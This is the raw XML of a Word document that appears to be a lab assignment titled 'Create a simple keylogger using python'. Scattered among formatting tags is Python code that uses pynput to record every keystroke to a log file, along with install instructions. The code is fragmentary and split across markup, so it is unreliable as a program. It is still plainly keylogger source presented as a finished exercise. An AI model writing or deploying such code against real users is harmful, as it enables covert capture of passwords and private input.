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32BD" w14:textId="77777777" w:rsidR="004E5A19" w:rsidRPr="00C935DB" w:rsidRDefault="004E5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5DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: - Create a simple keylogger using python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26766EF8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pynput.keyboard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 import Key, Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB461D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import logging </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B796E5B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E5A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 no name it gets into an empty string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCF32B5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log_dir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 xml:space="preserve"> = "" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6D6AE6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># This is a basic logging function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C347A2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>(filename=(log_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+"key_log.txt"), level=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, format='%(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)s:%(message)s:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5AB202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# This is from the library </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CDC08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(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B3D4C1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logging.info(str(key)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77067F29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# This says, listener is on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA48A24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>with Listener(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) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30399301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listener.join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4479893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To import the module type </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6EB2D2" w14:textId="4AD1E6EE" w:rsidR="00F15845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“Pip3 install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pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71951691" w14:textId="4883582C" w:rsidR="00C935DB" w:rsidRPr="004E5A19" w:rsidRDefault="00C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A7A9B" wp14:editId="0961DF66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DB" w:rsidRPr="004E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19"/>
    <w:rsid w:val="004E5A19"/>
    <w:rsid w:val="00851B1D"/>
    <w:rsid w:val="00A61717"/>
    <w:rsid w:val="00C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DC88"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{10A6A85F-0621-4C50-9429-C90B18AC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2022-09-28T05:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-28T06:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>